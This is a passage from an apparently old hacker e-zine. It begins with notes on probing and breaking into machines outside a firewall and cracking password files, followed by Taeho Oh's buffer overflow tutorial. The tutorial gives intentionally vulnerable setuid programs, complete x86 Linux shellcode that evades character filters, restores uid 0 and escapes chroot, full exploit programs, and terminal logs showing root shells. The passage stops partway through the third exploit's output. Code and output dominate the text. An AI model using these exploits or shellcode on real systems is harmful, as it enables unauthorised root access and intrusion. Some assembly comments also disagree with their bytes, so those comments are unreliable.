      type of network traffic coming from these sacrificial machines to connect 
      to machines behind the firewall--either as a convenience to themselves or 
      because of an oversight. 

      Another problem we see all too frequently is that the untrusted DNS 
      server, though outside the firewall, contains the organization's complete 
      DNS maps. Properly configured, it should contain maps only for those hosts 
      that       the Internet-at-large needs to know about, such as the DNS 
      server, the external mail gateway, and possibly, the company's Web site. 

      Using strobe to perform port scans on these external machines, we can note 
      any and all system services that can be reached for possible exploitation. 
      If we are successful at breaking into any of these machines on the outside       
      of the firewall, we make note of all valid user names in the password file 
      and see if there are any machines mentioned in the hosts file that weren't 
      listed in our DNS maps. 

      If we obtain "super-user" access, we run crack, a Unix-based password 
      decoder, on the shadowed password file, in anticipation that these same 
      logins and passwords also exist on other machines. We've found that crack       
      does some rather extensive dictionary attacks on people's encrypted 
      passwords and generally has a high rate of success. In some cases, the 
      password file isn't even shadowed, and super-user access isn't required to 
      get at the encrypted passwords. 

      @HWA 
      
34.0  Advanced buffer overflow exploit Written by Taeho Oh
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Contributed by Taeho Oh     
      
      -------------------------------------------------------------------------------
      -------------------------------------------------------------------------------
      -------------------------------------------------------------------------------
      
      
      
       Advanced buffer overflow exploit
      
      
       Written by Taeho Oh ( ohhara@postech.edu )
      ----------------------------------------------------------------------------
      Taeho Oh ( ohhara@postech.edu )                   http://postech.edu/~ohhara
      PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus
      PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug
      ----------------------------------------------------------------------------
      
      
      1. Introduction
       Nowadays there are many buffer overflow exploit codes. The early buffer
      overflow exploit codes only spawn a shell ( execute /bin/sh ). However,
      nowadays some of the buffer overflow exploit codes have very nice features.
      For example, passing through filtering, opening a socket, breaking chroot,
      and so on. This paper will attempt to explain the advanced buffer overflow
      exploit skill under intel x86 linux.
      
      2. What do you have to know before reading?
       You have to know assembly language, C language, and Linux. Of course, you
      have to know what buffer overflow is. You can get the information of the
      buffer overflow in phrack 49-14 ( Smashing The Stack For Fun And Profit
      by Aleph1 ). It is a wonderful paper of buffer overflow and I highly recommend
      you to read that before reading this one.
      
      3. Pass through filtering
       There are many programs which has buffer overflow problems. Why are not the
      all buffer overflow problems exploited? Because even if a program has a buffer
      overflow condition, it can be hard to exploit. In many cases, the reason is
      that the program filters some characters or converts characters into other
      characters. If the program filters all non printable characters, it's too
      hard to exploit. If the program filters some of characters, you can pass
      through the filter by making good buffer overflow exploit code. :)
      
      3.1 The example vulnerable program
      
      vulnerable1.c
      ----------------------------------------------------------------------------
      #include<string.h>
      #include<ctype.h>
      
      int main(int argc,int **argv)
      {
      char buffer[1024];
      int i;
      if(argc>1)
      {
      for(i=0;i<strlen(argv[1]);i++)
      argv[1][i]=toupper(argv[1][i]);
      strcpy(buffer,argv[1]);
      }
      }
      ----------------------------------------------------------------------------
      
       This vulnerable program converts small letters into capital letters of the
      user input. Therefore, you have to make a shellcode which doesn't contain any
      small letters. How can you do that? You have to reference the character string
      "/bin/sh" which must contain small letters. However, you can exploit this. :)
      
      3.2 Modify the normal shellcode
       Almost all buffer overflow exploit code uses this shellcode. Now you have
      to remove all small letters in the shellcode. Of course, the new shellcode
      has to execute a shell.
      
      normal shellcode
      ----------------------------------------------------------------------------
      char shellcode[]=
      "\xeb\x1f"                      /* jmp 0x1f              */
      "\x5e"                          /* popl %esi             */
      "\x89\x76\x08"                  /* movl %esi,0x8(%esi)   */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x88\x46\x07"                  /* movb %eax,0x7(%esi)   */
      "\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
      "\xb0\x0b"                      /* movb $0xb,%al         */
      "\x89\xf3"                      /* movl %esi,%ebx        */
      "\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
      "\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
      "\xcd\x80"                      /* int $0x80             */
      "\x31\xdb"                      /* xorl %ebx,%ebx        */
      "\x89\xd8"                      /* movl %ebx,%eax        */
      "\x40"                          /* inc %eax              */
      "\xcd\x80"                      /* int $0x80             */
      "\xe8\xdc\xff\xff\xff"          /* call -0x24            */
      "/bin/sh";                      /* .string \"/bin/sh\"   */
      ----------------------------------------------------------------------------
      
       This shellcode has 6 small letters. ( 5 small letters in the "/bin/sh" and
      1 small letter in "movl %esi,0x8(%esi)" )
       You cannot use "/bin/sh" character string directly to pass through the
      filter. However, you can insert any characters except for small characters.
      Therefore, you can insert "\x2f\x12\x19\x1e\x2f\x23\x18" instead of
      "\x2f\x62\x69\x6e\x2f\x73\x68" ( "/bin/sh" ). After you overflow the buffer
      , you have to change "\x2f\x12\x19\x1e\x2f\x23\x18" into
      "\x2f\x62\x69\x6e\x2f\x73\x68" to execute "/bin/sh". You can change easily
      by adding \x50 to \x62, \x69, \x6e, \x73, and \x68 when your shellcode
      is executed. Then how can you hide \x76 in "movl %esi,0x8(%esi)" ? You
      can change "movl %esi,0x8(%esi)" into other instructions that do the equivalent
      instruction and do not contain any small letters. For example, 
      "movl %esi,0x8(%esi)" can be changed into "movl %esi,%eax", "addl $0x8,%eax",
      "movl %eax,0x8(%esi)". The changed instructions have any small letters.
      ( I think other good instructions to do same thing. It's just an example. )
      Now the new shellcode is made.
      
      new shellcode
      ----------------------------------------------------------------------------
      char shellcode[]=
      "\xeb\x38"                      /* jmp 0x38              */
      "\x5e"                          /* popl %esi             */
      "\x80\x46\x01\x50"              /* addb $0x50,0x1(%esi)  */
      "\x80\x46\x02\x50"              /* addb $0x50,0x2(%esi)  */
      "\x80\x46\x03\x50"              /* addb $0x50,0x3(%esi)  */
      "\x80\x46\x05\x50"              /* addb $0x50,0x5(%esi)  */
      "\x80\x46\x06\x50"              /* addb $0x50,0x6(%esi)  */
      "\x89\xf0"                      /* movl %esi,%eax        */
      "\x83\xc0\x08"                  /* addl $0x8,%eax        */
      "\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x88\x46\x07"                  /* movb %eax,0x7(%esi)   */
      "\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
      "\xb0\x0b"                      /* movb $0xb,%al         */
      "\x89\xf3"                      /* movl %esi,%ebx        */
      "\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
      "\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
      "\xcd\x80"                      /* int $0x80             */
      "\x31\xdb"                      /* xorl %ebx,%ebx        */
      "\x89\xd8"                      /* movl %ebx,%eax        */
      "\x40"                          /* inc %eax              */
      "\xcd\x80"                      /* int $0x80             */
      "\xe8\xc3\xff\xff\xff"          /* call -0x3d            */
      "\x2f\x12\x19\x1e\x2f\x23\x18"; /* .string "/bin/sh"     */
                                      /* /bin/sh is disguised  */
      ----------------------------------------------------------------------------
      
      3.3 Exploit vulnerable1 program
      
       With this shellcode, you can make an exploit code easily.
      
      exploit1.c
      ----------------------------------------------------------------------------
      #include<stdio.h>
      #include<stdlib.h>
      
      #define ALIGN                             0
      #define OFFSET                            0
      #define RET_POSITION                   1024
      #define RANGE                            20
      #define NOP                            0x90
      
      char shellcode[]=
      "\xeb\x38"                      /* jmp 0x38              */
      "\x5e"                          /* popl %esi             */
      "\x80\x46\x01\x50"              /* addb $0x50,0x1(%esi)  */
      "\x80\x46\x02\x50"              /* addb $0x50,0x2(%esi)  */
      "\x80\x46\x03\x50"              /* addb $0x50,0x3(%esi)  */
      "\x80\x46\x05\x50"              /* addb $0x50,0x5(%esi)  */
      "\x80\x46\x06\x50"              /* addb $0x50,0x6(%esi)  */
      "\x89\xf0"                      /* movl %esi,%eax        */
      "\x83\xc0\x08"                  /* addl $0x8,%eax        */
      "\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x88\x46\x07"                  /* movb %eax,0x7(%esi)   */
      "\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
      "\xb0\x0b"                      /* movb $0xb,%al         */
      "\x89\xf3"                      /* movl %esi,%ebx        */
      "\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
      "\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
      "\xcd\x80"                      /* int $0x80             */
      "\x31\xdb"                      /* xorl %ebx,%ebx        */
      "\x89\xd8"                      /* movl %ebx,%eax        */
      "\x40"                          /* inc %eax              */
      "\xcd\x80"                      /* int $0x80             */
      "\xe8\xc3\xff\xff\xff"          /* call -0x3d            */
      "\x2f\x12\x19\x1e\x2f\x23\x18"; /* .string "/bin/sh"     */
                                      /* /bin/sh is disguised  */
      
      unsigned long get_sp(void)
      {
      __asm__("movl %esp,%eax");
      }
      
      main(int argc,char **argv)
      {
      char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;
      long addr;
      unsigned long sp;
      int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;
      int i;
      
      if(argc>1)
      offset=atoi(argv[1]);
      
      sp=get_sp();
      addr=sp-offset;
      
      for(i=0;i<bsize;i+=4)
      {
      buff[i+ALIGN]=(addr&0x000000ff);
      buff[i+ALIGN+1]=(addr&0x0000ff00)>>8;
      buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;
      buff[i+ALIGN+3]=(addr&0xff000000)>>24;
      }
      
      for(i=0;i<bsize-RANGE*2-strlen(shellcode)-1;i++)
      buff[i]=NOP;
      
      ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
      for(i=0;i<strlen(shellcode);i++)
      *(ptr++)=shellcode[i];
      
      buff[bsize-1]='\0';
      
      printf("Jump to 0x%08x\n",addr);
      
      execl("./vulnerable1","vulnerable1",buff,0);
      }
      ----------------------------------------------------------------------------
      
      exploit the vulnerable1 program
      ----------------------------------------------------------------------------
      [ ohhara@ohhara ~ ] {1} $ ls -l vulnerable1
      -rwsr-xr-x   1 root     root         4342 Oct 18 13:20 vulnerable1*
      [ ohhara@ohhara ~ ] {2} $ ls -l exploit1
      -rwxr-xr-x   1 ohhara   cse          6932 Oct 18 13:20 exploit1*
      [ ohhara@ohhara ~ ] {3} $ ./exploit1
      Jump to 0xbfffec64
      Segmentation fault
      [ ohhara@ohhara ~ ] {4} $ ./exploit1 500
      Jump to 0xbfffea70
      bash# whoami
      root
      bash#
      ----------------------------------------------------------------------------
      
      3.4 What can you do with this technique?
       You can pass through various form filters with this technique. When the
      vulnerable program filter !@#$%^&*(), you can make the new shellcode which
      doesn't contain !@#$%^&*(). However, you will have difficulties in making a
      shellcode, if the program filters many characters.
      
      4 Change uid back to 0
       The setuid root program which knows that work with root permission is very
      dangerous calls seteuid(getuid()) at start. And it calls seteuid(0) when it is
      needed. Many programmer thinks that it's safe after calling seteuid(getuid()).
      However, it's not true. The uid can be back to 0.
      
      4.1 The example vulnerable program
      
      vulnerable2.c
      ----------------------------------------------------------------------------
      #include<string.h>
      #include<unistd.h>
      
      int main(int argc,char **argv)
      {
      char buffer[1024];
      seteuid(getuid());
      if(argc>1)
      strcpy(buffer,argv[1]);
      }
      ----------------------------------------------------------------------------
      
       This vulnerable program calls seteuid(getuid()) at start. Therefore, you
      may think that "strcpy(buffer,argv[1]);" is OK. Because you can only get
      your own shell although you succeed in buffer overflow attack. However,
      if you insert a code which calls setuid(0) in the shellcode, you can get
      root shell. :)
      
      4.2 Make setuid(0) code
      
      setuidasm.c
      ----------------------------------------------------------------------------
      main()
      {
      setuid(0);
      }
      ----------------------------------------------------------------------------
      
      compile and disassemble
      ----------------------------------------------------------------------------
      [ ohhara@ohhara ~ ] {1} $ gcc -o setuidasm -static setuidasm.c
      [ ohhara@ohhara ~ ] {2} $ gdb setuidasm
      GNU gdb 4.17
      Copyright 1998 Free Software Foundation, Inc.
      GDB is free software, covered by the GNU General Public License, and you are
      welcome to change it and/or distribute copies of it under certain conditions.
      Type "show copying" to see the conditions.
      There is absolutely no warranty for GDB.  Type "show warranty" for details.
      This GDB was configured as "i386-redhat-linux"...
      (gdb) disassemble setuid
      Dump of assembler code for function __setuid:
      0x804ca00 <__setuid>:   movl   %ebx,%edx
      0x804ca02 <__setuid+2>: movl   0x4(%esp,1),%ebx
      0x804ca06 <__setuid+6>: movl   $0x17,%eax
      0x804ca0b <__setuid+11>:        int    $0x80
      0x804ca0d <__setuid+13>:        movl   %edx,%ebx
      0x804ca0f <__setuid+15>:        cmpl   $0xfffff001,%eax
      0x804ca14 <__setuid+20>:        jae    0x804cc10 <__syscall_error>
      0x804ca1a <__setuid+26>:        ret    
      0x804ca1b <__setuid+27>:        nop    
      0x804ca1c <__setuid+28>:        nop    
      0x804ca1d <__setuid+29>:        nop    
      0x804ca1e <__setuid+30>:        nop    
      0x804ca1f <__setuid+31>:        nop    
      End of assembler dump.
      (gdb)
      ----------------------------------------------------------------------------
      
      setuid(0); code
      ----------------------------------------------------------------------------
      char code[]=
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x31\xdb"                      /* xorl %ebx,%ebx        */
      "\xb0\x17"                      /* movb $0x17,%al        */
      "\xcd\x80";                     /* int $0x80             */
      ----------------------------------------------------------------------------
      
      4.3 Modify the normal shellcode
      
       Making new shellcode is very easy if you make setuid(0) code. Just insert
      the code into the start of the normal shellcode.
      
      new shellcode
      ----------------------------------------------------------------------------
      char shellcode[]=
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x31\xdb"                      /* xorl %ebx,%ebx        */
      "\xb0\x17"                      /* movb $0x17,%al        */
      "\xcd\x80"                      /* int $0x80             */
      "\xeb\x1f"                      /* jmp 0x1f              */
      "\x5e"                          /* popl %esi             */
      "\x89\x76\x08"                  /* movl %esi,0x8(%esi)   */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x88\x46\x07"                  /* movb %eax,0x7(%esi)   */
      "\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
      "\xb0\x0b"                      /* movb $0xb,%al         */
      "\x89\xf3"                      /* movl %esi,%ebx        */
      "\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
      "\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
      "\xcd\x80"                      /* int $0x80             */
      "\x31\xdb"                      /* xorl %ebx,%ebx        */
      "\x89\xd8"                      /* movl %ebx,%eax        */
      "\x40"                          /* inc %eax              */
      "\xcd\x80"                      /* int $0x80             */
      "\xe8\xdc\xff\xff\xff"          /* call -0x24            */
      "/bin/sh";                      /* .string \"/bin/sh\"   */
      ----------------------------------------------------------------------------
      
      4.4 Exploit vulnerable2 program
      
       With this shellcode, you can make an exploit code easily.
      
      exploit2.c
      ----------------------------------------------------------------------------
      #include<stdio.h>
      #include<stdlib.h>
      
      #define ALIGN                             0
      #define OFFSET                            0
      #define RET_POSITION                   1024
      #define RANGE                            20
      #define NOP                            0x90
      
      char shellcode[]=
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x31\xdb"                      /* xorl %ebx,%ebx        */
      "\xb0\x17"                      /* movb $0x17,%al        */
      "\xcd\x80"                      /* int $0x80             */
      "\xeb\x1f"                      /* jmp 0x1f              */
      "\x5e"                          /* popl %esi             */
      "\x89\x76\x08"                  /* movl %esi,0x8(%esi)   */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x88\x46\x07"                  /* movb %eax,0x7(%esi)   */
      "\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
      "\xb0\x0b"                      /* movb $0xb,%al         */
      "\x89\xf3"                      /* movl %esi,%ebx        */
      "\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
      "\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
      "\xcd\x80"                      /* int $0x80             */
      "\x31\xdb"                      /* xorl %ebx,%ebx        */
      "\x89\xd8"                      /* movl %ebx,%eax        */
      "\x40"                          /* inc %eax              */
      "\xcd\x80"                      /* int $0x80             */
      "\xe8\xdc\xff\xff\xff"          /* call -0x24            */
      "/bin/sh";                      /* .string \"/bin/sh\"   */
      
      unsigned long get_sp(void)
      {
      __asm__("movl %esp,%eax");
      }
      
      void main(int argc,char **argv)
      {
      char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;
      long addr;
      unsigned long sp;
      int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;
      int i;
      
      if(argc>1)
      offset=atoi(argv[1]);
      
      sp=get_sp();
      addr=sp-offset;
      
      for(i=0;i<bsize;i+=4)
      {
      buff[i+ALIGN]=(addr&0x000000ff);
      buff[i+ALIGN+1]=(addr&0x0000ff00)>>8;
      buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;
      buff[i+ALIGN+3]=(addr&0xff000000)>>24;
      }
      
      for(i=0;i<bsize-RANGE*2-strlen(shellcode)-1;i++)
      buff[i]=NOP;
      
      ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
      for(i=0;i<strlen(shellcode);i++)
      *(ptr++)=shellcode[i];
      
      buff[bsize-1]='\0';
      
      printf("Jump to 0x%08x\n",addr);
      
      execl("./vulnerable2","vulnerable2",buff,0);
      }
      ----------------------------------------------------------------------------
      
      exploit the vulnerable2 program
      ----------------------------------------------------------------------------
      [ ohhara@ohhara ~ ] {1} $ ls -l vulnerable2
      -rwsr-xr-x   1 root     root         4258 Oct 18 14:16 vulnerable2*
      [ ohhara@ohhara ~ ] {2} $ ls -l exploit2
      -rwxr-xr-x   1 ohhara   cse          6932 Oct 18 14:26 exploit2*
      [ ohhara@ohhara ~ ] {3} $ ./exploit2
      Jump to 0xbfffec64
      Illegal instruction
      [ ohhara@ohhara ~ ] {4} $ ./exploit2 500
      Jump to 0xbfffea70
      bash# whoami
      root
      bash#
      ----------------------------------------------------------------------------
      
      4.5 What can you do with this technique?
       You attack a setuid root program with buffer overflow but you only get your
      own shell. You can use this technique in that situation.
      
      5 Break chroot
       If the setuid root program is chrooted, you can access only chrooted
      directory. You cannot access root directory. However, you can access all
      directories, if your shellcode change the root directory into "/" again. :)
      
      5.1 The example vulnerable program
      
      vulnerable3.c
      ----------------------------------------------------------------------------
      #include<string.h>
      #include<unistd.h>
      
      int main(int argc,char **argv)
      {
      char buffer[1024];
      chroot("/home/ftp");
      chdir("/");
      if(argc>1)
      strcpy(buffer,argv[1]);
      }
      ----------------------------------------------------------------------------
      
       If you tries to execute "/bin/sh" with buffer overflow, it may executes
      "/home/ftp/bin/sh" ( if it exists ) and you cannot access the other directories
      except for "/home/ftp".
      
      5.2 Make break chroot code
       If you can execute below code, you can break chroot.
      
      breakchrootasm.c
      ----------------------------------------------------------------------------
      main()
      {
      mkdir("sh",0755);
      chroot("sh");
      /* many "../" */
      chroot("../../../../../../../../../../../../../../../../");
      }
      ----------------------------------------------------------------------------
      
       This break chroot code makes "sh" directory, because it's easy to reference.
      ( it's also used to execute "/bin/sh" )
      
      compile and disassemble
      ----------------------------------------------------------------------------
      [ ohhara@ohhara ~ ] {1} $ gcc -o breakchrootasm -static breakchrootasm.c
      [ ohhara@ohhara ~ ] {2} $ gdb breakchrootasm
      GNU gdb 4.17
      Copyright 1998 Free Software Foundation, Inc.
      GDB is free software, covered by the GNU General Public License, and you are
      welcome to change it and/or distribute copies of it under certain conditions.
      Type "show copying" to see the conditions.
      There is absolutely no warranty for GDB.  Type "show warranty" for details.
      This GDB was configured as "i386-redhat-linux"...
      (gdb) disassemble mkdir
      Dump of assembler code for function __mkdir:
      0x804cac0 <__mkdir>:    movl   %ebx,%edx
      0x804cac2 <__mkdir+2>:  movl   0x8(%esp,1),%ecx
      0x804cac6 <__mkdir+6>:  movl   0x4(%esp,1),%ebx
      0x804caca <__mkdir+10>: movl   $0x27,%eax
      0x804cacf <__mkdir+15>: int    $0x80
      0x804cad1 <__mkdir+17>: movl   %edx,%ebx
      0x804cad3 <__mkdir+19>: cmpl   $0xfffff001,%eax
      0x804cad8 <__mkdir+24>: jae    0x804cc40 <__syscall_error>
      0x804cade <__mkdir+30>: ret    
      0x804cadf <__mkdir+31>: nop    
      End of assembler dump.
      (gdb) disassemble chroot
      Dump of assembler code for function chroot:
      0x804cb60 <chroot>:     movl   %ebx,%edx
      0x804cb62 <chroot+2>:   movl   0x4(%esp,1),%ebx
      0x804cb66 <chroot+6>:   movl   $0x3d,%eax
      0x804cb6b <chroot+11>:  int    $0x80
      0x804cb6d <chroot+13>:  movl   %edx,%ebx
      0x804cb6f <chroot+15>:  cmpl   $0xfffff001,%eax
      0x804cb74 <chroot+20>:  jae    0x804cc40 <__syscall_error>
      0x804cb7a <chroot+26>:  ret    
      0x804cb7b <chroot+27>:  nop    
      0x804cb7c <chroot+28>:  nop    
      0x804cb7d <chroot+29>:  nop    
      0x804cb7e <chroot+30>:  nop    
      0x804cb7f <chroot+31>:  nop    
      End of assembler dump.
      (gdb)
      ----------------------------------------------------------------------------
      
      mkdir("sh",0755); code
      ----------------------------------------------------------------------------
      /* mkdir first argument is %ebx and second argument is   */
      /* %ecx.                                                 */
      char code[]=
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x31\xc9"                      /* xorl %ecx,%ecx        */
      "\xb0\x17"                      /* movb $0x27,%al        */
      "\x8d\x5e\x05"                  /* leal 0x5(%esi),%ebx   */
      /* %esi has to reference "/bin/sh" before using this     */
      /* instruction. This instruction load address of "sh"    */
      /* and store at %ebx                                     */
      "\xfe\xc5"                      /* incb %ch              */
      /* %cx = 0000 0001 0000 0000                             */
      "\xb0\x3d"                      /* movb $0xed,%cl        */
      /* %cx = 0000 0001 1110 1101                             */
      /* %cx = 000 111 101 101                                 */
      /* %cx = 0   7   5   5                                   */
      "\xcd\x80";                     /* int $0x80             */
      ----------------------------------------------------------------------------
      
      chroot("sh"); code
      ----------------------------------------------------------------------------
      /* chroot first argument is ebx */
      char code[]=
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x8d\x5e\x05"                  /* leal 0x5(%esi),%ebx   */
      "\xb0\x3d"                      /* movb $0x3d,%al        */
      "\xcd\x80";                     /* int $0x80             */
      ----------------------------------------------------------------------------
      
      chroot("../../../../../../../../../../../../../../../../"); code
      ----------------------------------------------------------------------------
      char code[]=
      "\xbb\xd2\xd1\xd0\xff"          /* movl $0xffd0d1d2,%ebx */
      /* disguised "../" character string                      */
      "\xf7\xdb"                      /* negl %ebx             */
      /* %ebx = $0x002f2e2e                                    */
      /* intel x86 is little endian.                           */
      /* %ebx = "../"                                          */
      "\x31\xc9"                      /* xorl %ecx,%ecx        */
      "\xb1\x10"                      /* movb $0x10,%cl        */
      /* prepare for looping 16 times.                         */
      "\x56"                          /* pushl %esi            */
      /* backup current %esi. %esi has the pointer of          */
      /* "/bin/sh".                                            */
      "\x01\xce"                      /* addl %ecx,%esi        */
      "\x89\x1e"                      /* movl %ebx,(%esi)      */
      "\x83\xc6\x03"                  /* addl $0x3,%esi        */
      "\xe0\xf9"                      /* loopne -0x7           */
      /* make "../../../../ . . . " character string at        */
      /* 0x10(%esi) by looping.                                */
      "\x5e"                          /* popl %esi             */
      /* restore %esi.                                         */
      "\xb0\x3d"                      /* movb $0x3d,%al        */
      "\x8d\x5e\x10"                  /* leal 0x10(%esi),%ebx  */
      /* %ebx has the address of "../../../../ . . . ".        */
      "\xcd\x80";                     /* int $0x80             */
      ----------------------------------------------------------------------------
      
      5.3 Modify the normal shellcode
      
       Making new shellcode is very easy if you make break chroot code. Just insert
      the code into the start of the normal shellcode and modify jmp and call
      argument.
      
      new shellcode
      ----------------------------------------------------------------------------
      char shellcode[]=
      "\xeb\x4f"                      /* jmp 0x4f              */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x31\xc9"                      /* xorl %ecx,%ecx        */
      "\x5e"                          /* popl %esi             */
      "\x88\x46\x07"                  /* movb %al,0x7(%esi)    */
      "\xb0\x27"                      /* movb $0x27,%al        */
      "\x8d\x5e\x05"                  /* leal 0x5(%esi),%ebx   */
      "\xfe\xc5"                      /* incb %ch              */
      "\xb1\xed"                      /* movb $0xed,%cl        */
      "\xcd\x80"                      /* int $0x80             */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x8d\x5e\x05"                  /* leal 0x5(%esi),%ebx   */
      "\xb0\x3d"                      /* movb $0x3d,%al        */
      "\xcd\x80"                      /* int $0x80             */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\xbb\xd2\xd1\xd0\xff"          /* movl $0xffd0d1d2,%ebx */
      "\xf7\xdb"                      /* negl %ebx             */
      "\x31\xc9"                      /* xorl %ecx,%ecx        */
      "\xb1\x10"                      /* movb $0x10,%cl        */
      "\x56"                          /* pushl %esi            */
      "\x01\xce"                      /* addl %ecx,%esi        */
      "\x89\x1e"                      /* movl %ebx,(%esi)      */
      "\x83\xc6\x03"                  /* addl %0x3,%esi        */
      "\xe0\xf9"                      /* loopne -0x7           */
      "\x5e"                          /* popl %esi             */
      "\xb0\x3d"                      /* movb $0x3d,%al        */
      "\x8d\x5e\x10"                  /* leal 0x10(%esi),%ebx  */
      "\xcd\x80"                      /* int $0x80             */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x89\x76\x08"                  /* movl %esi,0x8(%esi)   */
      "\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
      "\xb0\x0b"                      /* movb $0xb,%al         */
      "\x89\xf3"                      /* movl %esi,%ebx        */
      "\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
      "\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
      "\xcd\x80"                      /* int $0x80             */
      "\xe8\xac\xff\xff\xff"          /* call -0x54            */
      "/bin/sh";                      /* .string \"/bin/sh\"   */
      ----------------------------------------------------------------------------
      
      5.4 Exploit vulnerable3 program
       With this shellcode, you can make an exploit code easily.
      
      exploit3.c
      ----------------------------------------------------------------------------
      #include<stdio.h>
      #include<stdlib.h>
      
      #define ALIGN                             0
      #define OFFSET                            0
      #define RET_POSITION                   1024
      #define RANGE                            20
      #define NOP                            0x90
      
      char shellcode[]=
      "\xeb\x4f"                      /* jmp 0x4f              */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x31\xc9"                      /* xorl %ecx,%ecx        */
      "\x5e"                          /* popl %esi             */
      "\x88\x46\x07"                  /* movb %al,0x7(%esi)    */
      "\xb0\x27"                      /* movb $0x27,%al        */
      "\x8d\x5e\x05"                  /* leal 0x5(%esi),%ebx   */
      "\xfe\xc5"                      /* incb %ch              */
      "\xb1\xed"                      /* movb $0xed,%cl        */
      "\xcd\x80"                      /* int $0x80             */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x8d\x5e\x05"                  /* leal 0x5(%esi),%ebx   */
      "\xb0\x3d"                      /* movb $0x3d,%al        */
      "\xcd\x80"                      /* int $0x80             */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\xbb\xd2\xd1\xd0\xff"          /* movl $0xffd0d1d2,%ebx */
      "\xf7\xdb"                      /* negl %ebx             */
      "\x31\xc9"                      /* xorl %ecx,%ecx        */
      "\xb1\x10"                      /* movb $0x10,%cl        */
      "\x56"                          /* pushl %esi            */
      "\x01\xce"                      /* addl %ecx,%esi        */
      "\x89\x1e"                      /* movl %ebx,(%esi)      */
      "\x83\xc6\x03"                  /* addl %0x3,%esi        */
      "\xe0\xf9"                      /* loopne -0x7           */
      "\x5e"                          /* popl %esi             */
      "\xb0\x3d"                      /* movb $0x3d,%al        */
      "\x8d\x5e\x10"                  /* leal 0x10(%esi),%ebx  */
      "\xcd\x80"                      /* int $0x80             */
      "\x31\xc0"                      /* xorl %eax,%eax        */
      "\x89\x76\x08"                  /* movl %esi,0x8(%esi)   */
      "\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
      "\xb0\x0b"                      /* movb $0xb,%al         */
      "\x89\xf3"                      /* movl %esi,%ebx        */
      "\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
      "\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
      "\xcd\x80"                      /* int $0x80             */
      "\xe8\xac\xff\xff\xff"          /* call -0x54            */
      "/bin/sh";                      /* .string \"/bin/sh\"   */
      
      unsigned long get_sp(void)
      {
      __asm__("movl %esp,%eax");
      }
      
      void main(int argc,char **argv)
      {
      char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;
      long addr;
      unsigned long sp;
      int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;
      int i;
      
      if(argc>1)
      offset=atoi(argv[1]);
      
      sp=get_sp();
      addr=sp-offset;
      
      for(i=0;i<bsize;i+=4)
      {
      buff[i+ALIGN]=(addr&0x000000ff);
      buff[i+ALIGN+1]=(addr&0x0000ff00)>>8;
      buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;
      buff[i+ALIGN+3]=(addr&0xff000000)>>24;
      }
      
      for(i=0;i<bsize-RANGE*2-strlen(shellcode)-1;i++)
      buff[i]=NOP;
      
      ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
      for(i=0;i<strlen(shellcode);i++)
      *(ptr++)=shellcode[i];
      
      buff[bsize-1]='\0';
      
      printf("Jump to 0x%08x\n",addr);
      
      execl("./vulnerable3","vulnerable3",buff,0);
      }
      ----------------------------------------------------------------------------
      
      exploit the vulnerable3 program
      ----------------------------------------------------------------------------
      [ ohhara@ohhara ~ ] {1} $ ls -l vulnerable3
      -rwsr-xr-x   1 root     root         4348 Oct 18 15:06 vulnerable3*
      [ ohhara@ohhara ~ ] {2} $ ls -l exploit3
      -rwxr-xr-x   1 ohhara   cse          5059 Oct 18 17:13 exploit3*
      [ ohhara@ohhara ~ ] {3} $ ./exploit3
      Jump to 0xbfffec68
      Segmentation fault
      [ ohhara@ohhara ~ ] {4} $ ./exploit3 500
      Jump to 0xbfffea74
